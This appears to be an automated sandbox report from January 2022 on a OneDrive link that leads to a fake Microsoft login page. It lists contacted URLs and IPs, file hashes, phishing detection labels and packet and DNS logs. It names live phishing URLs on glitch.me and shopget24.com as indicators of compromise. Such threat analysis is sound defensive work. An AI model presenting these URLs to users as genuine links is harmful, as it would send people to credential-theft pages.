https://spoprod-a.akamaihd.net	f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr	false		high
https://www.google.com/	manifest.json.0.dr	false		high
https://feedback.googleusercontent.com	manifest.json0.0.dr	false		high
https://clients6.google.com	mirroring_hangouts.js.0.dr	false		high
https://www.onenote.com/officeaddins/learningtools/?et=pxY	data_1.2.dr	false		high
http://crl.pki.goog/gsr1/gsr1.crl0;	data_3.2.dr	false	URL Reputation: safe	unknown
https://magenta-flicker-surprise.glitch.me/freedo.htmlM	data_1.2.dr	false		high
https://www.google.com/images/cleardot.gif	craw_window.js.0.dr	false		high
https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001/wac_s_office-	data_1.2.dr	false		high
https://www.google.com/log?format=json&hasfast=true	mirroring_hangouts.js.0.dr	false		high
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-2.1.3.min.js	data_1.2.dr	false		high
https://sandbox.google.com/payments/v4/js/integrator.js	craw_window.js.0.dr, manifest.json.0.dr	false		high
https://accounts.google.com/MergeSession	craw_window.js.0.dr	false		high
https://www.onenote.com/officeaddins/learningtools/?et=	Current Session.0.dr, data_1.2.dr	false		high
https://hangouts.clients6.google.com	mirroring_hangouts.js.0.dr	false		high
https://accounts.google.com	5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, manifest.json0.0.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr	false		high
https://clients2.google.com/cr/report	mirroring_hangouts.js.0.dr	false		high
https://1drv.ms/o/s	data_1.2.dr	false		high
http://angularjs.org	angular.js.0.dr	false		high
https://github.com/angular/material	material_css_min.css.0.dr, angular.js.0.dr	false		high
https://onedrive.live.com/handlers/clientstring.mvc?mkt=en-US&group=GroupFolders&v=19.773.0927.2003&	data_1.2.dr	false		high
https://apis.google.com	5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, manifest.json0.0.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr	false		high
https://magenta-flicker-surprise.glitch.me/css/hover.css/	data_1.2.dr	false		high
https://p.sfx.ms//storage/aria-2.5.0.min.js	data_1.2.dr	false		high
https://www-googleapis-staging.sandbox.google.com	craw_window.js.0.dr, craw_background.js.0.dr	false		high
https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers	data_3.2.dr	false	URL Reputation: safe	unknown
https://clients2.google.com	5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0	mirroring_hangouts.js.0.dr	false		high
https://www.google.com/intl/en-US/chrome/blank.html	craw_background.js.0.dr	false		high
https://ogs.google.com	5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr	false		high
https://onedrive.live.com	Current Session.0.dr	false		high
https://code.jquery.com/jquery-3.1.1.min.js	data_1.2.dr	false		high
https://amcdn.msftauth.net/me?partner=OneNoteOnline&version=10.21153.1&market=EN-US&wrapperId=suites	data_1.2.dr	false	URL Reputation: safe	unknown
https://code.jquery.com/	Network Action Predictor.0.dr	false		high
https://chromium.googlesource.com/a/native_client/pnacl-llvm.git	pnacl_public_x86_64_crtend_o.0.dr, pnacl_public_x86_64_ld_nexe.0.dr	false		high
https://hangouts.google.com/	manifest.json0.0.dr	false		high
https://shopget24.com/images/sampledata/hack-run.pngx-turbo-charged-by:	data_1.2.dr	false	Avira URL Cloud: safe	unknown
https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001/jquery-1.7.2-	data_1.2.dr	false		high
http://pki.goog/gsr1/gsr1.crt02	data_3.2.dr	false	URL Reputation: safe	unknown
https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001//filesbucket3	data_1.2.dr	false		high
https://onedrive.live.comX-Content-Type-Options:	data_3.2.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/handlers/clientstring.mvc?mkt=en-US&group=Office&v=19.773.0927.2003&useReq	data_1.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.19.143.111	i.gyazo.com	United States	13335	CLOUDFLARENETUS	false
13.104.158.180	i-am3p-cor006.api.p001.1drv.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.219.248.46	shopget24.com	United States	22612	NAMECHEAP-NETUS	false
104.16.18.94	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
142.250.203.109	accounts.google.com	United States	15169	GOOGLEUS	false
40.90.142.226	i-am3p-cor002.api.p001.1drv.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
216.58.215.227	gstaticadssl.l.google.com	United States	15169	GOOGLEUS	false
104.18.11.207	maxcdn.bootstrapcdn.com	United States	13335	CLOUDFLARENETUS	false
13.107.42.12	1drv.ms	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
18.209.2.231	magenta-flicker-surprise.glitch.me	United States	14618	AMAZON-AESUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.217.168.33	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
65.9.61.53	d26p066pn2w0s0.cloudfront.net	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	562252
Start date:	28.01.2022
Start time:	17:23:19
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 49s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	browseurl.jbs
Sample URL:	https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.phis.win@34/259@27/15
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Browse: https://magenta-flicker-surprise.glitch.me/freedo.html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
TCP Packets have been reduced to 100
Created / dropped Files have been reduced to 100
Excluded IPs from analysis (whitelisted): 2.20.157.220, 142.250.203.110, 173.194.182.73, 13.107.42.13, 34.104.35.123, 142.250.203.99, 95.101.180.32, 95.101.180.66, 13.95.147.73, 2.20.156.213, 52.108.80.14, 52.109.76.92, 52.109.20.75, 20.50.201.200, 2.20.156.69, 142.250.203.106, 52.142.114.2, 204.79.197.200, 13.107.21.200, 152.199.19.160, 52.109.124.71, 13.107.246.60, 13.107.213.60, 52.182.143.211, 52.109.88.2, 20.190.160.69, 20.190.160.136, 20.190.160.6, 20.190.160.129, 20.190.160.71, 20.190.160.8, 20.190.160.75, 20.190.160.2, 104.83.131.69, 23.12.128.109, 172.217.168.42, 69.16.175.10, 69.16.175.42, 172.217.168.10, 13.107.6.171, 20.50.73.9, 172.217.168.74, 216.58.215.234
Excluded domains from analysis (whitelisted): odwebp.trafficmanager.net, e2682.g.akamaiedge.net, cds.s5x3j6q5.hwcdn.net, pnl1-onenote-eap.officeapps.live.com, c1-wildcard.cdn.office.net-c.edgekey.net.globalredir.akadns.net, www.tm.lg.prod.aadmsa.akadns.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, appsforoffice.microsoft.com.edgekey.net, r4.sn-4g5e6ns7.gvt1.com, fs-wildcard.microsoft.com.edgekey.net, cdn.onenote.net.edgekey.net, b-0016.b-msedge.net, star-azurefd-prod.trafficmanager.net, login.live.com, update.googleapis.com, officeclient.microsoft.com, www.gstatic.com, onenoteonlinesync.onenote.trafficmanager.net, omexmessaging.osi.office.net, fonts.googleapis.com, fs.microsoft.com, content-autofill.googleapis.com, onenote.wac.trafficmanager.net.b-0016.b-msedge.net, dual-a-0001.a-msedge.net, ajax.googleapis.com, westeurope1-odwebp.cloudapp.net, part-0032.t-0009.t-msedge.net, reverseproxy.onenote.trafficmanager.net, e19254.dscg.akamaiedge.net, www.tm.a.prd.aadg.akadns.net, www.goo
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	451603
Entropy (8bit):	5.009711072558331
Encrypted:	false
SSDEEP:	12288:ZHfRTyGZ6lup8Cfrvq4JBPKh+FBlESBw4p6:NfOCzvRKhGvwJ
MD5:	A78AD14E77147E7DE3647E61964C0335
SHA1:	CECC3DD41F4CEA0192B24300C71E1911BD4FCE45
SHA-256:	0D6803758FF8F87081FAFD62E90F0950DFB2DD7991E9607FE76A8F92D0E893FA
SHA-512:	DDE24D5AD50D68FC91E9E325D31E66EF8F624B6BB3A07D14FFED1104D3AB5F4EF1D7969A5CDE0DFBB19CB31C506F7DE97AF67C2F244F7E7E8E10648EA8321101
Malicious:	false
Reputation:	low
Preview:	BDic.... ....6...."..Z..4g....6.2...{/...3...5....AF 1363.AF nm.AF pt.AF n1.AF p.AF tc.AF SM.AF M.AF S.AF MS.AF MNR.AF GDS.AF MNT.AF MH.AF MR.AF SZMR.AF MJ.AF MT.AF MY.AF MRZ.AF MN.AF MG.AF RM.AF N.AF MV.AF XM.AF DSM.AF SD.AF G.AF R.AF MNX.AF MRS.AF MD.AF MNRB.AF B.AF ZSMR.AF PM.AF SMNGJ.AF SMN.AF ZMR.AF SMGB.AF MZR.AF GM.AF SMR.AF SMDG.AF RMZ.AF ZM.AF MDG.AF MDT.AF SMNXT.AF SDY.AF LSDG.AF LGDS.AF GLDS.AF UY.AF U.AF DSGNX.AF GNDSX.AF DSG.AF Y.AF GS.AF IEMS.AF YP.AF ZGDRS.AF XGNVDS.AF UT.AF GNDS.AF GVDS.AF MYPS.AF XGNDS.AF TPRY.AF MDSG.AF ZGSDR.AF DYSG.AF PMYTNS.AF AGDS.AF DRZGS.AF PY.AF GSPMDY.AF EGVDS.AF SL.AF GNXDS.AF DSBG.AF IM.AF I.AF MDGS.AF SMY.AF DSGN.AF DSLG.AF GMDS.AF MDSBG.AF SGD.AF IY.AF P.AF DSMG.AF BLZGDRS.AF TR.AF AGSD.AF ZGBDRSL.AF PTRY.AF ASDGV.AF ASM.AF ICANGSD.AF ICAM.AF IKY.AF AMS.AF PMYTRS.AF BZGVDRS.AF SDRBZG.AF GVMDS.AF PSM.AF DGLS.AF GNVXDS.AF AGDSL.AF DGS.AF XDSGNV.AF BZGDRS.AF AM.AF AS.AF A.AF LDSG.AF AGVDS.AF SDG.AF LDSMG.AF EDSMG.AF EY.AF DRSMZG.AF PRYT.AF LZ

Source: https://magenta-flicker-surprise.glitch.me/freedo.html	SlashNext: Label: Fake Login Page type: Phishing & Social usering
Source: https://shopget24.com/images/sampledata/hack-run.png	Avira URL Cloud: Label: phishing

Source: embedded	Matcher: Found strong image similarity, brand: Microsoft image: 13645.4.img.2.gfk.csv C3FC46C5799C76F9107504028F39190F
Source: embedded	Matcher: Found strong image similarity, brand: Microsoft image: 13645.4.img.3.gfk.csv FE22440D79FFA34950F512EF4A718B2A

Source: https://magenta-flicker-surprise.glitch.me/freedo.html	HTTP Parser: HTML title missing
Source: https://magenta-flicker-surprise.glitch.me/freedo.html	HTTP Parser: HTML title missing

Source: https://magenta-flicker-surprise.glitch.me/freedo.html	HTTP Parser: Number of links: 0
Source: https://magenta-flicker-surprise.glitch.me/freedo.html	HTTP Parser: Number of links: 0

Source: https://magenta-flicker-surprise.glitch.me/freedo.html	HTTP Parser: No <meta name="author".. found
Source: https://magenta-flicker-surprise.glitch.me/freedo.html	HTTP Parser: No <meta name="author".. found

Source: https://magenta-flicker-surprise.glitch.me/freedo.html	HTTP Parser: No <meta name="copyright".. found
Source: https://magenta-flicker-surprise.glitch.me/freedo.html	HTTP Parser: No <meta name="copyright".. found

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 16:24:56 GMTContent-Length: 3672Connection: closeCache-Control: max-age=0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 16:24:57 GMTContent-Length: 3672Connection: closeCache-Control: max-age=0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 17:24:24.228250027 CET	49756	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.228302956 CET	443	49756	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.228395939 CET	49756	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.229984045 CET	49756	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.230004072 CET	443	49756	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.232094049 CET	49757	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.232136011 CET	443	49757	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.232294083 CET	49757	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.233386993 CET	49757	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.233407974 CET	443	49757	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.237899065 CET	49760	443	192.168.2.6	142.250.203.109
Jan 28, 2022 17:24:24.237946987 CET	443	49760	142.250.203.109	192.168.2.6
Jan 28, 2022 17:24:24.238070965 CET	49760	443	192.168.2.6	142.250.203.109
Jan 28, 2022 17:24:24.238337994 CET	49760	443	192.168.2.6	142.250.203.109
Jan 28, 2022 17:24:24.238356113 CET	443	49760	142.250.203.109	192.168.2.6
Jan 28, 2022 17:24:24.294575930 CET	443	49760	142.250.203.109	192.168.2.6
Jan 28, 2022 17:24:24.295977116 CET	49760	443	192.168.2.6	142.250.203.109
Jan 28, 2022 17:24:24.296031952 CET	443	49760	142.250.203.109	192.168.2.6
Jan 28, 2022 17:24:24.297142982 CET	443	49760	142.250.203.109	192.168.2.6
Jan 28, 2022 17:24:24.297277927 CET	49760	443	192.168.2.6	142.250.203.109
Jan 28, 2022 17:24:24.304354906 CET	443	49757	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.305403948 CET	49757	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.305432081 CET	443	49757	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.305931091 CET	443	49757	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.306026936 CET	49757	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.306751966 CET	443	49757	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.306837082 CET	49757	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.313569069 CET	443	49756	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.337025881 CET	49756	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.337070942 CET	443	49756	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.337999105 CET	443	49756	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.338150024 CET	49756	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.339521885 CET	443	49756	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.339616060 CET	49756	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.658646107 CET	49760	443	192.168.2.6	142.250.203.109
Jan 28, 2022 17:24:24.658885956 CET	443	49760	142.250.203.109	192.168.2.6
Jan 28, 2022 17:24:24.659508944 CET	49757	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.659688950 CET	443	49757	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.659816980 CET	49756	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.660032988 CET	443	49756	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.662125111 CET	49760	443	192.168.2.6	142.250.203.109
Jan 28, 2022 17:24:24.662163973 CET	443	49760	142.250.203.109	192.168.2.6
Jan 28, 2022 17:24:24.662404060 CET	49757	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.662462950 CET	443	49757	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.709392071 CET	443	49757	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.709502935 CET	49757	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.715981960 CET	443	49760	142.250.203.109	192.168.2.6
Jan 28, 2022 17:24:24.716089964 CET	443	49760	142.250.203.109	192.168.2.6
Jan 28, 2022 17:24:24.716175079 CET	49760	443	192.168.2.6	142.250.203.109
Jan 28, 2022 17:24:24.716240883 CET	49760	443	192.168.2.6	142.250.203.109
Jan 28, 2022 17:24:24.718980074 CET	49760	443	192.168.2.6	142.250.203.109
Jan 28, 2022 17:24:24.719023943 CET	443	49760	142.250.203.109	192.168.2.6
Jan 28, 2022 17:24:24.735922098 CET	49757	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.735984087 CET	443	49757	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.779984951 CET	49756	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:24.780014992 CET	443	49756	13.107.42.12	192.168.2.6
Jan 28, 2022 17:24:24.879334927 CET	49756	443	192.168.2.6	13.107.42.12
Jan 28, 2022 17:24:27.756309986 CET	49771	443	192.168.2.6	172.217.168.33
Jan 28, 2022 17:24:27.756372929 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.756483078 CET	49771	443	192.168.2.6	172.217.168.33
Jan 28, 2022 17:24:27.756736994 CET	49771	443	192.168.2.6	172.217.168.33
Jan 28, 2022 17:24:27.756758928 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.814055920 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.814589977 CET	49771	443	192.168.2.6	172.217.168.33
Jan 28, 2022 17:24:27.814620972 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.814980984 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.815074921 CET	49771	443	192.168.2.6	172.217.168.33
Jan 28, 2022 17:24:27.815777063 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.815849066 CET	49771	443	192.168.2.6	172.217.168.33
Jan 28, 2022 17:24:27.821130991 CET	49771	443	192.168.2.6	172.217.168.33
Jan 28, 2022 17:24:27.821156025 CET	49771	443	192.168.2.6	172.217.168.33
Jan 28, 2022 17:24:27.821170092 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.821300030 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.854249954 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.854285002 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.854340076 CET	49771	443	192.168.2.6	172.217.168.33
Jan 28, 2022 17:24:27.854367018 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.854458094 CET	49771	443	192.168.2.6	172.217.168.33
Jan 28, 2022 17:24:27.854916096 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.854963064 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.854984999 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.855032921 CET	49771	443	192.168.2.6	172.217.168.33
Jan 28, 2022 17:24:27.855065107 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.855127096 CET	49771	443	192.168.2.6	172.217.168.33
Jan 28, 2022 17:24:27.855755091 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.857183933 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.857208967 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.857260942 CET	49771	443	192.168.2.6	172.217.168.33
Jan 28, 2022 17:24:27.857291937 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.857357979 CET	49771	443	192.168.2.6	172.217.168.33
Jan 28, 2022 17:24:27.860538960 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.860601902 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.860625982 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.860661030 CET	49771	443	192.168.2.6	172.217.168.33
Jan 28, 2022 17:24:27.860685110 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.860733986 CET	49771	443	192.168.2.6	172.217.168.33
Jan 28, 2022 17:24:27.872826099 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.872879982 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.872899055 CET	443	49771	172.217.168.33	192.168.2.6
Jan 28, 2022 17:24:27.873045921 CET	49771	443	192.168.2.6	172.217.168.33

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 17:24:24.156147003 CET	60342	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:24.182255983 CET	61346	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:24.182848930 CET	53	60342	8.8.8.8	192.168.2.6
Jan 28, 2022 17:24:24.187591076 CET	51774	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:24.206163883 CET	53	51774	8.8.8.8	192.168.2.6
Jan 28, 2022 17:24:24.209355116 CET	53	61346	8.8.8.8	192.168.2.6
Jan 28, 2022 17:24:24.746849060 CET	56061	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:27.713905096 CET	54064	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:27.753318071 CET	53	54064	8.8.8.8	192.168.2.6
Jan 28, 2022 17:24:28.113251925 CET	52811	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:28.118016005 CET	55299	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:29.529706001 CET	49694	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:32.358258963 CET	62116	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:41.504414082 CET	56628	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:42.581209898 CET	60778	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:43.538197994 CET	54683	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:43.555219889 CET	59329	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:43.767401934 CET	64021	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:44.511073112 CET	58177	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:44.685889006 CET	50700	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:55.853202105 CET	50243	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:55.875557899 CET	53	50243	8.8.8.8	192.168.2.6
Jan 28, 2022 17:24:56.666337013 CET	61249	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:56.668207884 CET	65252	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:56.688087940 CET	53	65252	8.8.8.8	192.168.2.6
Jan 28, 2022 17:24:57.044219017 CET	60211	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:57.066894054 CET	53	60211	8.8.8.8	192.168.2.6
Jan 28, 2022 17:24:57.241861105 CET	56570	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:57.242091894 CET	58454	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:57.262310982 CET	53	58454	8.8.8.8	192.168.2.6
Jan 28, 2022 17:24:57.264080048 CET	53	56570	8.8.8.8	192.168.2.6
Jan 28, 2022 17:24:58.277590990 CET	55180	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:58.297981977 CET	53	55180	8.8.8.8	192.168.2.6
Jan 28, 2022 17:24:59.521970034 CET	58721	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:59.543011904 CET	53	58721	8.8.8.8	192.168.2.6
Jan 28, 2022 17:24:59.574251890 CET	57691	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:59.584007978 CET	52943	53	192.168.2.6	8.8.8.8
Jan 28, 2022 17:24:59.595539093 CET	53	57691	8.8.8.8	192.168.2.6
Jan 28, 2022 17:24:59.604322910 CET	53	52943	8.8.8.8	192.168.2.6
Jan 28, 2022 17:25:47.627244949 CET	60850	53	192.168.2.6	8.8.8.8

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 17:24:57.428700924 CET	23881	OUT	GET /images/sampledata/hack-run.png HTTP/1.1 Host: shopget24.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 28, 2022 17:24:57.596715927 CET	23940	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 707 date: Fri, 28 Jan 2022 16:24:57 GMT server: LiteSpeed location: https://shopget24.com/images/sampledata/hack-run.png x-turbo-charged-by: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 